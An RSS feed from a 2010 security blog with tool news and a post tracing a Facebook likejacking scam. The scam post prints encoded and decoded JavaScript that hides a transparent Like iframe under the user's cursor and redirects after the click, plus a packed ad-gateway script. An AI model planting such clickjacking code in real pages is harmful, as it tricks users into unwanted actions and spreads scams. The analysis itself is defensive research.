Just Another Hacker http://www.justanotherhacker.com/ Kitchen sink security en Copyright 2010 Sat, 31 Jul 2010 15:51:51 +1000 http://www.sixapart.com/movabletype/ http://www.rssboard.org/rss-specification Graudit version 1.7 released
  • New PHP signatures
  • Improved C signatures for fewer false positives
  • Improved dotnet signatures
  • Whitespace neutrality for all signatures
  • -l operator lists available databases
  • -x operator for excluding files
  • configure script added to make chain
  • Makefile install targets changed, install is now server wide
Package maintainers should take note of the last change. The make file currently supports the old style home directory install (make user install), but that is deprecated and will be dropped as ./configure --prefix /home/user/bin --dbdir /home/user/.graudit;make install does the same thing.
I have also added some scripts from my talks, you can find them in the aux directory. There are no install rules for them so they are only available from within the graudit-1.7_src tarball. My thanks to the people who contributed with patches and bug reports, keep them coming.

You can download the latest version from the graudit download page.
]]> http://www.justanotherhacker.com/2010/07/graudit-version-17-released.html http://www.justanotherhacker.com/2010/07/graudit-version-17-released.html audit code review graudit news project security Sat, 31 Jul 2010 15:51:51 +1000 Tool review: Halberd halberd-ss.png
Like most of my favourite tools halberd does one thing, and does it well. It tries to detect individual servers behind a load balancer. The idea behind it is not new, but this is the best put together tool that I have used. It even handles multiple A records right off the bat. It is a little short on documentation and the error messages could be better, but it's still a great reconnaissance/testing tools for pen testers and system administrators alike.

Grab your copy today from http://halberd.superadditive.com/

]]> http://www.justanotherhacker.com/2010/07/tool-review-halberd.html http://www.justanotherhacker.com/2010/07/tool-review-halberd.html penetration testing sysadmin tools Fri, 09 Jul 2010 20:16:54 +1000 Static analysis with graudit - RMMM June 2010 advisory for my graudit talk at the ruxcon meetup this month.

Static analysis with graudit ruxcon presentation - 20100625
]]> http://www.justanotherhacker.com/2010/06/static-analysis-with-graudit---rmmm-june-2010.html http://www.justanotherhacker.com/2010/06/static-analysis-with-graudit---rmmm-june-2010.html graudit presentation ruxcon static analysis Sun, 27 Jun 2010 14:24:14 +1000 Some thoughts on url scanning post (rant?) on url shorteners needing to detect malware.

The initial problems that url scanners face are simple evasion techniques, such as the click to get infected method that you can see in my previous post. This blogspot url scores quite cleanly.
urlscanner-cleanly.jpg
And why shouldn't it? It doesn't contain anything directly malicious and so it should score cleanly until reputation or reactive defense catches up with it. Listen you say, who cares about the herding page, it doesn't do anything, it's the delivery page we care about. If a user visits a "benign" page that redirects him to malware, it will still be stopped at the malicious page!

Alas dear friend, a simple server side block is all it takes to stop http://scanner.novirusthanks.org from accessing the offending page (http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet.html).
av-ip-ban-avoidance.jpg 
Other documented techniques seen in the wild include only delivering the malicious pay load on 1 of x requests, user agent filtering, js obfu that will break automated deobfu and more. I have seen an alert box break browser automation, so there is no shortage of options for the bad guys. However considering how simple it is to shutdown todays url scanners I doubt we will see too many advanced techniques yet. Url scanning might overcome these simple bypasses in the future, but they should not be considered defense and certainly not a replacement for your desktop AV.

]]> http://www.justanotherhacker.com/2010/06/some-thoughts-on-url-scanning.html http://www.justanotherhacker.com/2010/06/some-thoughts-on-url-scanning.html antivirus rant security Thu, 17 Jun 2010 10:59:58 +1000 Chasing a rabbit down the hole. rabbithole.png
Today I noticed this one in my facebook feed and thought; that's different! It's been a while since I chased a rabbit, so down the rabbit hole I went. 
~$ GET http://craziestattoos.blogspot.com/

<meta property="og:title" content="The Guy With The Largest Dick On The Planet">
<meta property="og:type" content="article">
<meta property="og:url" content="http://craziestattoos.blogspot.com/"><link rel="me" href="http://www.blogger.com/profile/09319063164064567908">
<link rel="openid.server" href="http://www.blogger.com/openid-server.g">
<!-- --><style type="text/css">@import url(http://www.blogger.com/static/v1/v-css/navbar/697174003-classic.css);
div.b-mobile {display:none;}
</style>

<script type="text/javascript">
    function setAttributeOnload(object, attribute, val) {
      if(window.addEventListener) {
        window.addEventListener("load",
          function(){ object[attribute] = val; }, false);
      } else {
        window.attachEvent('onload', function(){ object[attribute] = val; });
      }
    }
  </script>
<iframe src="http://www.blogger.com/navbar.g?targetBlogID=6834350941604690306&blogName=The+Guy+With+The+Largest+Dick+On+The+...&publishMode=PUBLISH_MODE_BLOGSPOT&navbarType=BLUE&layoutType=CLASSIC&searchRoot=http%3A%2F%2Fcraziestattoos.blogspot.com%2Fsearch&blogLocale=nl&homepageUrl=http%3A%2F%2Fcraziestattoos.blogspot.com%2F" marginwidth="0" marginheight="0" id="navbar-iframe" allowtransparency="true" title="Blogger Navigation and Search" frameborder="0" height="30" scrolling="no" width="100%"></iframe>
<div></div>
<center><a href="http://access.im/1/AzO93"><img src="http://i46.tinypic.com/33ygjk6.jpg" /></a></center>
<script type="text/javascript" src="http://www.blogger.com/static/v1/common/js/4161557039-csitail.js"></script>
<script type="text/javascript">BLOG_initCsi('classic_blogspot');</script></body>
The blogspot page delivers a access.im link visible as a "skip this add page" image and redirects to http:// allhqpics.com/ the-guy-with-the-largest-dick-on-the-planet.html when you click on it. Lets head further down the burrow
~$ GET http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet.html
<head>
<title>The Guy With The Largest Dick On The Planet</title>
<script src="jquery.js" type="text/javascript"></script>
<script src="top.js" type="text/javascript"></script>
</head>
<body> 
<script type="text/javascript">
$(document).ready(function() {									
	$("a[name^='faq-']").each(function() {
		$(this).click(function() {
			if( $("#" + this.name).is(':hidden') ) {
				$("#" + this.name).fadeIn('normal');
                                $("a[name^='faq-']").hide('normal');
			} else {
				$("#" + this.name).fadeOut('normal');
			}			
			return false;
		});
	});
});
</script>

<style type="text/css">
.faq-answer {
display:none;
}
</style>
<center><img src="18.png" /></center>
<center><div class="faq-answer" id="faq-1"><img src="pre.jpg"></div></center>
<script src="bottom.js" type="text/javascript"></script>  
</body>
Looks pretty normal, right? I took a look at the jquery.js and at a cursory glance it looks authentic, but then top.js delivers the first rabbit droppings 
~$ GET http://allhqpics.com/top.js
<!--
document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%76%61%72%20%69%6E%74%65%72%76%61%6C%3B%0A%20%20%20%20%20%20%20%20%24%28%66%75%6E%63%74%69%6F%6E%28%29%0A%7B%0A%20%20%20%20%69%6E%74%65%72%76%61%6C%3D%73%65%74%49%6E%74%65%72%76%61%6C%28%22%75%70%64%61%74%65%41%63%74%69%76%65%45%6C%65%6D%65%6E%74%28%29%3B%22%2C%20%35%30%30%29%3B%0A%7D%29%3B%0A%0A%66%75%6E%63%74%69%6F%6E%20%75%70%64%61%74%65%41%63%74%69%76%65%45%6C%65%6D%65%6E%74%28%29%0A%7B%0A%20%20%20%20%69%66%20%28%20%24%28%64%6F%63%75%6D%65%6E%74%2E%61%63%74%69%76%65%45%6C%65%6D%65%6E%74%29%2E%61%74%74%72%28%27%69%64%27%29%3D%3D%22%66%62%66%72%61%6D%65%22%20%29%20%0A%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%63%6C%65%61%72%49%6E%74%65%72%76%61%6C%28%69%6E%74%65%72%76%61%6C%29%3B%0A%20%20%20%20%20%20%20%20%69%66%6C%61%67%3D%31%3B%0A%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%61%6C%6C%68%71%70%69%63%73%2E%63%6F%6D%2F%74%68%65%2D%67%75%79%2D%77%69%74%68%2D%74%68%65%2D%6C%61%72%67%65%73%74%2D%64%69%63%6B%2D%6F%6E%2D%74%68%65%2D%70%6C%61%6E%65%74%2D%32%2E%68%74%6D%6C%22%3B%20%0A%20%20%20%20%7D%20%20%20%20%0A%7D%20%20%0A%20%20%20%20%20%20%20%20%3C%2F%73%63%72%69%70%74%3E%0A'));
//-->
Decoding that string gives us: 
<script type="text/javascript">
var interval;
        $(function()
{
    interval=setInterval("updateActiveElement();", 500);
});

function updateActiveElement()
{
    if ( $(document.activeElement).attr('id')=="fbframe" ) 
    {
        clearInterval(interval);
        iflag=1;
        document.location="http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet-2.html"; 
    }    
}  
        </script>
I'll get back to the second html page in a bit, first lets check bottom.js from the first page: 
~$ GET http://allhqpics.com/bottom.js
<!--
document.write(unescape('%3C%64%69%76%20%73%74%79%6C%65%3D%22%6F%76%65%72%66%6C%6F%77%3A%20%68%69%64%64%65%6E%3B%20%77%69%64%74%68%3A%20%31%30%70%78%3B%20%68%65%69%67%68%74%3A%20%31%32%70%78%3B%20%70%6F%73%69%74%69%6F%6E%3A%20%61%62%73%6F%6C%75%74%65%3B%20%66%69%6C%74%65%72%3A%61%6C%70%68%61%28%6F%70%61%63%69%74%79%3D%30%29%3B%20%2D%6D%6F%7A%2D%6F%70%61%63%69%74%79%3A%30%2E%30%3B%20%2D%6B%68%74%6D%6C%2D%6F%70%61%63%69%74%79%3A%20%30%2E%30%3B%20%6F%70%61%63%69%74%79%3A%20%30%2E%30%3B%22%20%69%64%3D%22%69%63%6F%6E%74%61%69%6E%65%72%22%3E%0A%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D%2F%70%6C%75%67%69%6E%73%2F%6C%69%6B%65%2E%70%68%70%3F%68%72%65%66%3D%68%74%74%70%3A%2F%2F%66%75%6E%6E%79%2D%63%65%6C%65%62%2D%70%69%63%73%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%2F%26%61%6D%70%3B%6C%61%79%6F%75%74%3D%73%74%61%6E%64%61%72%64%26%61%6D%70%3B%73%68%6F%77%5F%66%61%63%65%73%3D%66%61%6C%73%65%26%61%6D%70%3B%77%69%64%74%68%3D%34%35%30%26%61%6D%70%3B%61%63%74%69%6F%6E%3D%6C%69%6B%65%26%61%6D%70%3B%66%6F%6E%74%3D%74%61%68%6F%6D%61%26%61%6D%70%3B%63%6F%6C%6F%72%73%63%68%65%6D%65%3D%6C%69%67%68%74%26%61%6D%70%3B%68%65%69%67%68%74%3D%38%30%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%73%74%79%6C%65%3D%22%62%6F%72%64%65%72%3A%6E%6F%6E%65%3B%20%6F%76%65%72%66%6C%6F%77%3A%68%69%64%64%65%6E%3B%20%77%69%64%74%68%3A%35%30%70%78%3B%20%68%65%69%67%68%74%3A%32%33%70%78%3B%22%20%61%6C%6C%6F%77%54%72%61%6E%73%70%61%72%65%6E%63%79%3D%22%74%72%75%65%22%20%69%64%3D%22%66%62%66%72%61%6D%65%22%20%6E%61%6D%65%3D%22%66%62%66%72%61%6D%65%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A%3C%2F%64%69%76%3E%0A%3C%73%63%72%69%70%74%3E%0A%20%20%20%20%76%61%72%20%69%66%6C%61%67%20%3D%20%30%3B%0A%20%20%20%20%76%61%72%20%69%63%6F%6E%74%61%69%6E%65%72%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%69%63%6F%6E%74%61%69%6E%65%72%27%29%3B%20%20%20%20%0A%20%20%20%20%76%61%72%20%73%74%61%6E%64%61%72%64%62%6F%64%79%3D%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6D%70%61%74%4D%6F%64%65%3D%3D%22%43%53%53%31%43%6F%6D%70%61%74%22%29%3F%20%64%6F%63%75%6D%65%6E%74%2E%64%6F%63%75%6D%65%6E%74%45%6C%65%6D%65%6E%74%20%3A%20%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%20%2F%2F%63%72%65%61%74%65%20%72%65%66%65%72%65%6E%63%65%20%74%6F%20%63%6F%6D%6D%6F%6E%20%22%62%6F%64%79%22%20%61%63%72%6F%73%73%20%64%6F%63%74%79%70%65%73%0A%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20%66%75%6E%63%74%69%6F%6E%20%6D%6F%75%73%65%46%6F%6C%6C%6F%77%65%72%28%65%29%7B%0A%20%20%20%20%20%20%20%20%2F%2A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%44%4F%20%4E%4F%54%20%45%44%49%54%20%54%48%49%53%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2A%2F%0A%20%20%20%20%69%66%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%29%20%0A%20%20%20%20%7B%20%2F%2F%20%66%6F%72%20%49%45%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%74%6F%70%20%3D%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%2E%79%2D%35%29%2B%73%74%61%6E%64%61%72%64%62%6F%64%79%2E%73%63%72%6F%6C%6C%54%6F%70%2B%27%70%78%27%3B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%6C%65%66%74%20%3D%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%2E%78%2D%35%29%2B%73%74%61%6E%64%61%72%64%62%6F%64%79%2E%73%63%72%6F%6C%6C%4C%65%66%74%2B%27%70%78%27%3B%0A%20%20%20%20%7D%20%0A%20%20%20%20%65%6C%73%65%20%0A%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%74%6F%70%20%3D%20%28%65%2E%70%61%67%65%59%2D%35%29%2B%27%70%78%27%3B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%6C%65%66%74%20%3D%20%28%65%2E%70%61%67%65%58%2D%35%29%2B%27%70%78%27%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20%7D%0A%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%6F%6E%6D%6F%75%73%65%6D%6F%76%65%20%3D%20%66%75%6E%63%74%69%6F%6E%28%65%29%20%7B%0A%20%20%20%20%20%20%20%20%69%66%20%28%69%66%6C%61%67%20%3D%3D%20%30%29%20%7B%6D%6F%75%73%65%46%6F%6C%6C%6F%77%65%72%28%65%29%3B%7D%0A%20%20%20%20%20%20%20%20%65%6C%73%65%0A%20%20%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%64%69%73%70%6C%61%79%20%3D%20%27%6E%6F%6E%65%27%3B%20%7D%0A%20%20%20%20%7D%0A%0A%20%20%20%20%3C%2F%73%63%72%69%70%74%3E'));
//-->
Which decodes to: 
<div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="icontainer">
<iframe src="http://www.facebook.com/plugins/like.php?href=http://funny-celeb-pics.blogspot.com/&layout=standard&show_faces=false&width=450&action=like&font=tahoma&colorscheme=light&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe>
</div>
<script>
    var iflag = 0;
    var icontainer = document.getElementById('icontainer');    
    var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes
    
    
    
    function mouseFollower(e){
        /*                    DO NOT EDIT THIS                         */
    if (window.event) 
    { // for IE
        icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
        icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
    } 
    else 
    {
        icontainer.style.top = (e.pageY-5)+'px';
        icontainer.style.left = (e.pageX-5)+'px';
    }

    }
    document.onmousemove = function(e) {
        if (iflag == 0) {mouseFollower(e);}
        else
        {
        icontainer.style.display = 'none'; }
    }

    </script>
This gets a little more interesting, now there is a CSRF request to facebook for you to like the malicious site and lure more unsuspecting victims. It's time to pick up the pace and move on. 
~$ GET http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet-2.html
<head>
<title>The Guy With The Largest Dick On The Planet</title>
<script src="jquery.js" type="text/javascript"></script>
<script type="text/javascript" src="http://www.cpalead.com/mygateway.php?pub=42138&gateid=OTM5ODQ%3D"></script>
</head>
<body> 
<script type="text/javascript">
$(document).ready(function() {									
	$("a[name^='faq-']").each(function() {
		$(this).click(function() {
			if( $("#" + this.name).is(':hidden') ) {
				$("#" + this.name).fadeIn('normal');
                                $("a[name^='faq-']").hide('normal');
			} else {
				$("#" + this.name).fadeOut('normal');
			}			
			return false;
		});
	});
});
</script>

<style type="text/css">
.faq-answer {
display:none;
}
<style>
<center><a href="#" name="faq-1"><img src="pre.jpg"></a></center>
<center></a><div class="faq-answer" id="faq-1"><a href="#" name="faq-1"><img src="hero.jpg"></div></center>  
</body>
And the reference to cpalead gives it away. That url delivers your typical function(p,a,c,k,e,d) obfuscated javascript which we decode using the tom liston method 
function showme(txt) {
	document.write("<textarea rows=50 cols=50>");document.write(txt); document.write("</textarea>"); 
}

//Copyright 2010 CPAlead.com

showme(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 124={"123":[{"13":"224=","18":"99","66":"0"},{"13":"200=","18":"50","66":"0"},{"13":"225=","18":"30","66":"0"},{"13":"222=","18":"95","66":"0"}]};9 76(7,189){90(6 65=0;65<124.123.97;65++){4(124.123[65].13==231(7)){153 124.123[65][189]}}}6 108=\'\';6 245=85;6 248=75;6 131=85;6 102=85;6 250=85;6 59=0;6 149=0;6 175=\'79\';6 249=\'242 246 230 228 227 62 239 240 243.\';9 251(113){6 133=19.128;4(247 19.128!=\'9\'){19.128=113}12{19.128=9(){4(133){241{133()}234(235){}}4(113){113()}}}}9 114(7){6 88=2.81("20").207(0);4(88==237){59=59+300;48("114(\'"+7+"\');",300)}12{199(7)}}9 226(7){4(108>0){59=59+108+\'155\';48("114(\'"+7+"\');",108+\'155\')}12{59=59+300;48("114(\'"+7+"\');",300)}}9 177(41){78=2.81(\'64\');90(8=0;8!=78.97;8++){4(78[8].13!=\'24\'){4(41==0){78[8].3.33=\'86\'}4(41==1){78[8].3.33=\'47\'}}}}9 140(41){6 211=2.81(\'236\');90(6 209=2.211,8=0,22;22=209[8];8++){4(22.13!=\'170\'&&22.13!=\'159\'){4(41==0){4(195.198==\'212 220 215\'){22.73(\'87\',\'25\');22.3.33=\'86\'}12{22.73(\'87\',\'25\');6 196=22.252,139=22.244;139.233(22);139.201(22,196)}}4(41==1){22.73(\'87\',\'19\');4(195.198==\'212 220 215\'){22.3.33=\'47\'}}}}}9 150(41){49=2.81(\'238\');90(8=0;8!=49.97;8++){4(49[8].13!=\'170\'&&49[8].13!=\'159\'){4(41==0){49[8].73(\'87\',\'25\');49[8].3.33=\'86\'}4(41==1){49[8].3.33=\'47\';49[8].73(\'87\',\'19\')}}}}9 96(){6 68,61;4(19.104&&19.184){68=19.176+19.223;61=19.104+19.184}12 4(2.20.183>2.20.60){68=2.20.232;61=2.20.183}12{68=2.20.229;61=2.20.60}6 14,58;4(137.104){14=2.74.98?2.74.98:137.176;58=137.104}12 4(2.74&&2.74.89){14=2.74.98;58=2.74.89}12 4(2.20){14=2.20.98;58=2.20.89}181=61<58?58:61;180=68<14?68:14;153 51=146 263(180,181,14,58)}9 141(){6 51=96();4((51[1]-2.5(\'11\').3.23.218("130",""))>30){2.5(\'11\').3.23=(51[1]+\'130\')}4(149==0){48("141();",169)}}9 77(7,178){4(178!=175){34.213.291=\'37://71.43.46/290.72?82=83\'}6 15=2.5(\'11\');6 26=2.5(\'35\');140(1);150(1);177(1);149=1;102=75;4(76(7,\'66\')==1&&191!=75){15.3.120="118(18=0)";15.3.18="0.0";2.5(\'24\').44=\'37://71.292.293/294-109.72\';191=75}12{26.3.21=\'42\';15.3.21=\'42\';2.5(\'24\').44=\'289:288\';2.5(\'24\').3.21=\'42\'}153 85}9 57(174){4(!102&&131){4(19.188&&19.188.185){6 147=1}12{6 147=0}67=146 173();67.44="37://71.43.46/62-145.72?82=83&185="+147+"&145="+174;2.20.161(67);164()}}9 151(148){4(!102&&131){67=146 173();67.44="37://71.43.46/62-145-283.72?82=83&148="+148;2.20.161(67);194(\'37://71.43.46/282.72?82=83\')}}9 156(){4(!2.5(\'11\')){57(\'109-110-132\')}12 4(!2.5(\'35\')){57(\'62-110-132\')}12 4(!2.5(\'24\')){57(\'64-110-132\')}12 4(2.5(\'11\').3.17!="100%"||2.5(\'11\').3.21!="55"||2.5(\'11\').3.33!="47"){57(\'109-163\')}12 4(2.5(\'35\').3.17!="100%"||2.5(\'35\').3.21!="55"||2.5(\'35\').3.33!="47"){57(\'62-163\')}12 4(2.5(\'24\').3.21!="55"){57(\'64-110-47\')}4(2.5(\'24\').60<=300&&2.5(\'24\').60!=0){151(\'64-23-158-\'+2.5(\'24\').60)}12 4(2.5(\'11\').60<=100&&2.5(\'11\').89<=100){151(\'109-23-158-\'+2.5(\'11\').60+\'-\'+2.5(\'11\').89)}48("156()",172)}9 164(){6 143=["\\168\\165\\136\\84\\134\\284","\\136\\84\\167\\134\\187\\204\\84\\216"];19[143[1]][143[0]]()}9 194(217){6 154=["\\296\\168\\165\\287","\\136\\84\\167\\134\\187\\204\\84\\216"];34[154[1]][154[0]]=217}9 219(7){2.5(\'24\').286.213.218(\'37://71.43.46/295.72?82=83&302=203.45.56.190&7=\'+7+\'&299=\'+166(2.298)+\'\')}9 214(7){6 51=96();6 88=2.81("20").207(0);6 15=2.253("10");15.73(\'13\',\'11\');15.3.21=\'42\';15.3.28=\'121\';15.3.34=\'0\';15.3.202=\'0\';15.3.197=\'301\';15.3.17=\'100%\';88.201(15,88.303);142=76(7,\'18\');92=142/100;2.5(\'11\').3.120="118(18="+142+")";2.5(\'11\').3.18=92;15.3.23=(51[1]+\'130\');15.3.21=\'55\';15.3.33=\'47\'}9 199(7){6 106=[\'200%297\'];4(!2.5(\'11\')){214(7)}12{4(2.5(\'11\').3.21=\'42\'){2.5(\'11\').3.21=\'55\';92=76(7,\'18\')/100;2.5(\'11\').3.120="118(18="+92+")";2.5(\'11\').3.18=92}}6 51=96();141();140(0);150(0);6 26=2.5(\'35\');26.3.21=\'55\';26.3.33=\'47\';26.3.28=\'121\';26.3.34=\'0\';26.3.202=\'0\';26.3.197=\'285\';26.3.17=\'100%\';6 144=0;90(6 8=0;8<106.97;8++){4(106[8]==7||106[8]==166(7)){6 157=76(7,\'66\');4(157==1){2.5(\'129\').53=\'<10 3="28: 54; 17: 152; 34: 193; 63: -186; 36-39: 38; 31-29: 115; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 3="112: 105;"><91 44="37://94.43.46/103/160-62/160-280-262-261.179" 93="0" 101="111 117"></14></10>\';2.5(\'116\').53=\'<10 3="28: 54; 17: 152; 34: 193; 63: -186; 36-39: 38; 31-29: 125; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 13="221" 3="112: 105;"><91 17="135" 23="40" 44="37://94.43.46/103/192.182" 93="0" 101="111 117"></14></10>\'}12{2.5(\'129\').53=\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 115; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 3="112: 105;"><91 44="37://94.43.46/103/281/264.179" 93="0" 101="111 117"></14></10>\';2.5(\'116\').53=\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 125; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 13="221" 3="112: 105;"><91 17="135" 23="40" 44="37://94.43.46/103/192.182" 93="0" 101="111 117"></14></10>\'}6 144=1;132=8;260}}4(144==0){2.5(\'129\').53=\'\';2.5(\'116\').53=\'\'}26.3.23=(51[1]+\'130\');48("219(\'"+7+"\');",169);2.5(\'24\').3.21=\'55\';131=75;48("156();",255)}9 171(){119=119-1;2.5("256").53=119;4(119<=0){257()}12{48("171()",172)}}2.16(\'<3 258="36/266">#11{27-32: #155; 120:118(18=80); 18: 0.80; -267-18: 0.80;}\');2.16(\'#35 14 {27:42;52-210:138;32:#206;36-208:42}\');2.16(\'#35 91 {93: 162;}\');2.16(\'#35 14:276 {27:42;52-210:138;32:#206;36-208:275}</3>\');2.16(\'<10 13="35" 3="21:42; 36-39: 38; 277-23: 138; ">\');2.16(\'<10 13="129" 39="38" 3="28: 121; 17: 100%; 31-29: 115;">\');2.16(\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 115; 52-70: 69; 27-32: 25;">\');2.16(\'</10>\');2.16(\'</10>\');2.16(\'<10 13="116" 39="38" 3="28: 121; 17: 100%; 31-29: 125;">\');2.16(\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 125; 52-70: 69; 27-32: 25;">\');2.16(\'</10>\');2.16(\'</10>\');2.16(\'<10 3="278: 152 279 162; 27: 25; 23: 274; 31-29: 273;">\');2.16(\'<64 17="100%" 23="269" 13="24" 44="" 268="75" 270="0" 3="28: 54; 23: 272; 205-65: 86; 205-271: 86; 27-32: 25; 31-29: 254; " 259="265"></64>\');2.16(\'</10></10>\');',10,304,'||document|style|if|getElementById|var|gateid|i|function|div|aijvqsnovujrsfoj3|else|id|a|dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5|write|width|opacity|window|body|display|em|height|wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831|transparent|zcpkmswwmxlgjzbue41a138882143252732d893|background|position|index||z|color|visibility|top|wzjyzgbhqzohhlhvef8426b5a89be2|text|http|center|align||onoroff|none|cpalead|src||com|visible|setTimeout|object_tags||arrayPageSize|font|innerHTML|relative|block||guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9|b|bodyloadtime|offsetHeight|d|widget|right|iframe|x|donation_widget|dpjfszjhzduviwkn424c2477e2d48|c|12px|size|www|php|setAttribute|documentElement|true|getWidgetSetting|mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a|iframe_tags|ytndhhmwdjexjqej106a67d2||getElementsByTagName|pub|42138|x6F|false|hidden|wmode|gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62|clientHeight|for|img|opacity_setting_moz|border|static||getPageSize|length|clientWidth|||alt|cbtonfugwctexmjdff8bd9e3648ab7|images|innerHeight|pointer|closebuttons|onclick|popup_delay|overlay|not|Close|cursor|func|checkForBody|11863866|arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c|Widget|alpha|countdown|filter|absolute|135px|settings|widgetJSON|11863936|172px|452px|onload|lpepmphihufelzdd28c18f8093587772fdd38f|px|ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6|found|oldonload|x61||x6C|self|normal|pn|jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37|dontscroll|opacity_setting_ie|_0x96be|has_closebtn|tamper|new|hasfirebug|reason|mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e|mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22|ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69|72px|return|_0xb500|000|hienslexztaecvon972b4c6959457b72d8591114abeb305d|is_donation|invalid|video_bucket|rice|appendChild|0px|styles|sgfplcetedjsqmbvbbcb115|x65|escape|x63|x72|500|video_controller|secondpass|1000|Image|tampertype|xwwjxyvbmsrjfpud17e9cae225420|innerWidth|yecqogvnndwlktmu|adixdgozwczhuvaf6e84b|png|pageWidth|pageHeight|gif|scrollHeight|scrollMaxY|firebug|225px|x74|console|settingname||secondclose|blank7|158px|lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73|navigator|nx|zIndex|appName|myGatewayStart|NzMxNTM|insertBefore|left||x69|overflow|fff|item|decoration|ems|weight|embeds|Microsoft|location|createOverlay|Explorer|x6E|url|replace|loadGatewayIframe|Internet|closebtn|ODA1OTE|scrollMaxX|OTM5ODQ|NzM5NTQ|startGateway|this|disable|offsetWidth|to|unescape|scrollWidth|removeChild|catch|e|embed|null|object|has|been|try|Your|logged|parentNode|countdownStarted|attempt|typeof|isloaded|gmgqvtjawhodlboj8b0d5f2c|bodyexisted|addWidgetLoadEvent|nextSibling|createElement|11863886|5000|closelink|riunpfcaxfcggjhpf|type|scrollbars|break|button|close|Array|close_btn|NO|css|moz|allowtransparency|640|frameborder|y|640px|11863881|482px|underline|hover|line|margin|auto|skin|help|nostyle|test|x64|11863846|contentWindow|x66|blank|about|adblock|href|surveysforcharity|org|thankyou|mygateway_iframe_loader|x68|3D|referrer|ref||11863836|subid|firstChild'.split('|'),0,{}))
Which gives us more obfuscated javascript 
